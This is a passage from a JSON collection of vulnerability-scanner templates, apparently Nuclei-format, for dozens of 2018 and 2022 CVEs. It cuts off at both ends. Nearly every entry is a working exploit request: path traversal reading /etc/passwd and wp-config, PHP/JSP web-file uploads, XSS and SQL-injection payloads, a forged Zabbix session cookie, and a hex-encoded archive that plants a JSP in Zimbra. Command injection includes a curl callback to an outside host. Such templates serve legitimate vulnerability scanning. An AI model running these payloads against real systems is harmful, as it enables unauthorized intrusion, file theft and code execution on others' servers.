Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 